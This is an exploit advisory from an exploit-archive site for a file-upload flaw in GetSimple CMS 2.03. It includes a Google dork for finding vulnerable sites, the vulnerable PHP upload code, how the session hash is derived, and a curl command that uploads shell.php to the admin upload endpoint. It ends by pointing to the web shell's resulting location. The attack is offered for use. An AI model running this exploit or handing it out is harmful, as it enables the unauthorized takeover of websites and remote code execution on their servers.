ExploitFixes
GetSimple CMS <=2.03 Remote Upload Shell (Upload-Ajax.php) 0day 2011-02-16 00:06:04
Posted by: reflective

# Exploit Title: GetSimple CMS &lt;=2.03 Remote Upload Shell (0day)
# Google Dork: &quot;powered by GetSimple Version 2.03&quot;
# Date: 15/FEB/2011
# Author: s3rg3770 and Chuzz (irc.azzurra.org #hackerjournal)
# Site Author: http://reflective.noblogs.org (OWL?)

(\___/)
(o\ /o)
/|:.V.:|\
\\::::://
-----`&quot;&quot; &quot;&quot;`-----


# Software Link: http://get-simple.info/
# Version: 2.0.3
# Tested on: *nix

----------------------------------------------------------------------
[INFO]

What a Fuck? SESSIONHASH for upload a file? It's a bacon's security...

Bug Code:
getsimple/admin/upload-ajax.php

if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(&lsquo;//&rsquo;,'/&rsquo;,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------

Generating SESSIONHASH: md5( $salt. $sitename)


[XPL]
curl -F &ldquo;[email protected];filename=shell.php&rdquo; http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO


After, enjoy your Bacon-Shell here ...http://getsimple_localhost/data/uploads/shell.php

Thanks to my ASCELL...